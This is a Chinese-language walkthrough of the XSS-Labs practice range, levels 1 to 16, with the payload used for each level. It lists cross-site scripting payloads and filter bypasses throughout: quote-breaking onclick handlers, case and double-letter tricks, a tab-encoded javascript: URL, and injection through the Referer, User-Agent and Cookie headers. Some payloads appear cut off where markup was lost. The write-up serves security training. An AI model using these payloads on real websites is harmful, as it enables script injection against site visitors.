XSS_Labs靶场通关笔记

每一关的方法不唯一;可以结合源码进行分析后构造payload;

通关技巧(四步):

1.输入内容看源码变化;

2.找到内容插入点;

3.测试是否有过滤;

4.构造payload绕过

第一关

构造payload:name=

XSS_Labs靶场通关笔记_第1张图片

第二关

构造payload:" οnclick=alert() "

XSS_Labs靶场通关笔记_第2张图片

XSS_Labs靶场通关笔记_第3张图片

第三关

构造payload:' οnclick=alert() '

XSS_Labs靶场通关笔记_第4张图片

XSS_Labs靶场通关笔记_第5张图片

第四关

构造payload:" οnclick=alert() "

XSS_Labs靶场通关笔记_第6张图片

XSS_Labs靶场通关笔记_第7张图片

第五关

构造payload:">123//

XSS_Labs靶场通关笔记_第8张图片

XSS_Labs靶场通关笔记_第9张图片

第六关

构造payload:" Onclick=alert() "

XSS_Labs靶场通关笔记_第10张图片

XSS_Labs靶场通关笔记_第11张图片

第七关

构造payload:" oonnclick=alert() "

XSS_Labs靶场通关笔记_第12张图片

XSS_Labs靶场通关笔记_第13张图片

第八关

在url中构造payload:javascr%09ipt:alert()

也可以用html实体编码替换script中的一个字符来绕过(方法很多,不演示)

XSS_Labs靶场通关笔记_第14张图片

XSS_Labs靶场通关笔记_第15张图片

第九关

构造payload:javascript:alert('http://')

XSS_Labs靶场通关笔记_第16张图片

XSS_Labs靶场通关笔记_第17张图片

第十关

构造payload:t_sort=" οnclick=alert() type="

XSS_Labs靶场通关笔记_第18张图片

XSS_Labs靶场通关笔记_第19张图片

第十一关

通过bp抓包修改referer:" οnclick=alert() type="

XSS_Labs靶场通关笔记_第20张图片

XSS_Labs靶场通关笔记_第21张图片

XSS_Labs靶场通关笔记_第22张图片

第十二关

通过bp抓包修改User-Agent: " οnclick=alert() type="

XSS_Labs靶场通关笔记_第23张图片

XSS_Labs靶场通关笔记_第24张图片

XSS_Labs靶场通关笔记_第25张图片

第十三关

通过bp抓包修改Cookie: user=" οnclick=alert() type="

XSS_Labs靶场通关笔记_第26张图片

XSS_Labs靶场通关笔记_第27张图片

XSS_Labs靶场通关笔记_第28张图片

第十四关(坏了,直接略过)

第十五关

构造payload:src="level1.php?name=

123"

XSS_Labs靶场通关笔记_第29张图片

XSS_Labs靶场通关笔记_第30张图片

第十六关

构造payload:keyword=

对空格进行实体编码了,需要空格绕过

XSS_Labs靶场通关笔记_第31张图片

XSS_Labs靶场通关笔记_第32张图片

由于浏览器不支持flash,17、18、19、20略过

10

你可能感兴趣的:(xss,笔记,前端)